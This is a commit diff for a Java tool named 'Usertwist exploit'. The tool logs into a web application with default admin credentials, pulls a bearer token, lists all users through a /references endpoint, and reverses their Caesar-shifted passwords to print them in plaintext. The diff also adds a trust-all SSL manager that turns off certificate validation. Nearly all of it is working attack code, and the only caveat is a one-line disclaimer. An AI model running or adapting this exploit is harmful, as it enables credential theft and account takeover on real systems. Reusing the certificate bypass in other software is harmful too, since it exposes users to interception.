Added SSL verification bypass & port choice

.idea/inspectionProfiles/Project_Default.xml

@@ -2,7 +2,7 @@
   <profile version="1.0">
     <option name="myName" value="Project Default" />
     <inspection_tool class="AutoCloseableResource" enabled="true" level="WARNING" enabled_by_default="true">
-      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient" />
+      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient,java.net.http.HttpClient.Builder,build" />
     </inspection_tool>
   </profile>
 </component>

src/fr/motysten/usertwist/exploit/Main.java

@@ -1,9 +1,14 @@
 package fr.motysten.usertwist.exploit;
 
 import fr.motysten.usertwist.exploit.tools.Cesar;
+import fr.motysten.usertwist.exploit.tools.SSLBypass;
 import org.json.JSONArray;
 import org.json.JSONObject;
 
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLException;
+import javax.net.ssl.SSLHandshakeException;
+import javax.net.ssl.TrustManager;
 import java.io.BufferedReader;
 import java.io.IOException;
 import java.io.InputStreamReader;
@@ -11,23 +16,35 @@ import java.net.URI;
 import java.net.http.HttpClient;
 import java.net.http.HttpRequest;
 import java.net.http.HttpResponse;
+import java.security.KeyManagementException;
+import java.security.NoSuchAlgorithmException;
+import java.security.SecureRandom;
 
 public class Main {
 
     public static String link = "https://poc.athelas.fr";
     public static String username = "admin";
     public static String password = "AdminSecret1C";
+    public static String port = "443";
 
-    public static void main(String[] args) throws IOException, InterruptedException {
+    public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
         BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
 
+        SSLContext customContext = SSLContext.getInstance("TLS");
+        customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
+
         System.out.println("Usertwist exploit by Motysten");
+        System.out.println("Please don't use for unethical purpose !\n");
         String readLine;
 
         System.out.println("Please enter the URL to attack (leave empty to use default) :");
         readLine = reader.readLine();
         if (!readLine.isEmpty()) {link = readLine;}
 
+        System.out.println("Please enter the port of the remote web server (leave empty to use default) :");
+        readLine = reader.readLine();
+        if (!readLine.isEmpty()) {port = readLine;}
+
         System.out.println("Please enter the used username (leave empty to use default) :");
         readLine = reader.readLine();
         if (!readLine.isEmpty()) {username = readLine;}
@@ -42,19 +59,59 @@ public class Main {
         requestJSON.put("username", username);
         requestJSON.put("password", password);
 
-        HttpRequest request = HttpRequest.newBuilder(URI.create(link + "/login"))
-                .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
-                .build();
+        System.out.println("Gathering Bearer token...");
+
+        HttpResponse<String> response = null;
+        HttpRequest request;
+
+        boolean tokenFound = false;
+        while (!tokenFound) {
+            try {
+                request = HttpRequest.newBuilder(URI.create(link + ":" + port + "/login"))
+                        .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
+                        .build();
+
+                response = client.send(request, HttpResponse.BodyHandlers.ofString());
+                tokenFound = true;
+            } catch (SSLHandshakeException e) {
+                System.err.println("Remote server certificate issuer couldn't be verified. Someone could be spying on your network.");
+                System.err.println("Would you like to continue anyway ? [y/N]");
+                if (!reader.readLine().equalsIgnoreCase("y")) {
+                    System.err.println("Operation aborted ! Security failure.");
+                    System.exit(1);
+                } else {
+                    client = HttpClient.newBuilder().sslContext(customContext).build();
+                }
+            } catch (SSLException e) {
+                if (e.getMessage().contains("plaintext connection?")) {
+                    System.err.println("Looks like you're trying to send an HTTPS request on HTTP port. Would you like to switch on port 443 ? [Y/n]");
+                    if (reader.readLine().equalsIgnoreCase("n")) {
+                        System.err.println("Operation aborted !");
+                        System.exit(1);
+                    } else {
+                        port = "443";
+                    }
+                }
+            }
+        }
+
+        if (response.statusCode() == 401) {
+            System.err.println("Invalid credentials ! Please try again (defaults credentials could help)");
+            System.exit(1);
+        }
 
-        HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
         JSONObject responseObject = new JSONObject(response.body());
         String token = responseObject.optString("token");
 
+        System.out.println("Token found: " + token);
+
         requestJSON = new JSONObject();
         requestJSON.put("term", "");
         requestJSON.put("entity", "users");
 
-        request = HttpRequest.newBuilder(URI.create(link + "/references"))
+        System.out.println("\nScanning for existing users...");
+
+        request = HttpRequest.newBuilder(URI.create(link + ":" + port + "/references"))
                 .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
                 .setHeader("Authorization", "Bearer " + token)
                 .build();
@@ -62,12 +119,15 @@ public class Main {
         response = client.send(request, HttpResponse.BodyHandlers.ofString());
         JSONArray usersArray = new JSONArray(response.body());
 
+        System.out.println(usersArray.length() + " users found !");
+        System.out.println("\nDecrypting passwords...\n");
+
         for (int i = 0; i < usersArray.length(); i++) {
             JSONObject user = usersArray.getJSONObject(i);
             String login = user.getString("username");
             String password = Cesar.cesarRotate(user.getString("data"), -4);
 
-            System.out.println(login + " => " + password);
+            System.out.println((i + 1) + ". " + login + " => " + password);
         }
     }
 

src/fr/motysten/usertwist/exploit/tools/SSLBypass.java

@@ -0,0 +1,43 @@
+package fr.motysten.usertwist.exploit.tools;
+
+import javax.net.ssl.SSLEngine;
+import javax.net.ssl.X509ExtendedTrustManager;
+import java.net.Socket;
+import java.security.cert.X509Certificate;
+
+public class SSLBypass extends X509ExtendedTrustManager {
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+    }
+
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+    }
+
+    @Override
+    public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
+
+    }
+
+    @Override
+    public void checkServerTrusted(X509Certificate[] x509Certificates, String s)  {
+
+    }
+
+    @Override
+    public X509Certificate[] getAcceptedIssuers() {
+        return new X509Certificate[0];
+    }
+}